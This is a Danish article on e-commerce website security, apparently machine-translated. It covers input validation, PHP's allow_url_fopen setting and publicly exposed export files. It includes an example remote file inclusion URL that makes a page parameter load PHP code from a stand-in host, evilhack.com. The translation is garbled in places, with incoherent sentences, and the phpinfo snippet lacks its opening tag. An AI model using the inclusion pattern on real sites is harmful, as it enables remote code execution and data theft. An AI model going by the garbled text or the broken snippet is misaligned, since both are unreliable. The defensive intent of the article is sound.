E-Commerce Sikkerhed - Fjernelsen af sikkerhedshuller

Sikkerhed i en e-handel website skal være en vigtig overvejelse, når de udvikler en e-handel website eller software. En udvikler skal være opmærksomme på alle de sikkerhed ved at designe et websted. Med e-handel bliver det mere almindeligt i disse dage, er antallet af angreb på sikkerheden helt sikkert stigende. Paranoia er en sund ting for e-handel bygherrer, vi er nødt til at holde op til gaten med sikkerhedsspørgsmål, og holde vores ører og øjne åbne. Selv om de følgende huller er alvorlige, de følgende huller, hvis denne er let fast.

Nedenstående liste omfatter en række sikkerheds overvejelser, der skal medtages, når de udvikler et websted. Denne artikel omfatter ikke e-butikstyveri, kan du se min separat artikel om dette.

Brugerinput - hver indgang, det være sig ind i en mængde, der søger efter et produkt, indtaste et navn osv., der skal valideres for mistænkelige tegn. Hvis dette ikke sker, er det muligt at indtaste "?>", lukning slutningen tags i PHP og udføre nogle PHP kode.

Det er langt sikrere at tal og tegn az (hovedstæder inkluderet) og 0-9 og intet andet, i stedet lave en liste over alle de tegn, der ikke skal være der. Validering script behov for at rulle gennem hvert tegn én efter én. Dette skal nås ved hjælp af i server side validering, ikke Javascript. Brug af server side input validering er vigtigt at holde uønskede tegn

Der findes en anden vigtig når de udfører PHP kode. Når du bruger PHP der er en indstilling kaldet allow_url_fopen som gør det muligt at åbne filer fra et PHP script. Denne indstilling skal være slukket, medmindre det er absolut nødvendigt.

Forestil Dem, du har PHP-scripts til både faste sidehoveder og sidefødder, og få adgang til dine websider, du ville skrive i http://www.mysite.com/index.php?page=page2. Alt det kræver er en hacker at køre et script ved at ændre disse parametre ved at skrive "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" med nogle PHP kode i filen "hacker.txt". Du kunne have noget ske, filer PHP læst, slettede vitale oplysninger stjålet.

Hvis du ikke er sikker på, hvis denne indstilling er tændt eller slukket, skal du kopiere følgende PHP-kode i en tekstfil, og uploade den til din webserver:

phpinfo ();
?>

Når du får adgang til dit script på din webserver, skal du komme på tværs af indstillingen allow_url_fopen under konfiguration.

En computer-bruger, kan under normale omstændigheder ikke finde værdien af denne indstilling.

Vær forsigtig med eksporterede data som ordrer, produkter i CSV og MySQL-filer. Hvis disse data eksporteres fra et script og holdes på webserveren under et fælles filnavn dvs. http://www.mysite.com/admin/output_tables.csv. Det er faktisk kun et problem, når de eksporterede data er bosat i en fil i en mappe, som er offentligt tilgængelige. Der er to måder at undgå dette smuthul - For det første har uddatafilen bag et password beskyttet mappe, for det andet har de data, der befinder sig inde i en HTML-textarea form element på et script. Det storeowner kan derefter kopiere disse oplysninger fra tekstfiler og oprette en ny fil på deres computer og indsætte oplysningerne her.

Alt det kræver er en hacker at finde dette filnavn ved at tjekke e-handel software's demo hjemmeside og kigge efter samme filnavn på en rigtig hjemmeside.

Rate Article

Related Videos
Play Video How to Strengthen Network Security with Cisco Network Manager	Play Video Understanding your Home Network Router #5 - Secure Your Network with WPA2	Play Video Learn About Secure Computing	Play Video SÃ¥dan at holde din computer sikker	Play Video Hvordan skal kontrollere sikkerheden i Windows Vista

Nedenstående liste omfatter flere artikler relateret til ovenstående artikel fra "E-handel" artiklen kategori.

Folk er interesseret i ovenstående artikel "E-Commerce Sikkerhed - Fjernelsen af sikkerhedshuller" er også interesseret i de relaterede artikler anført nedenfor: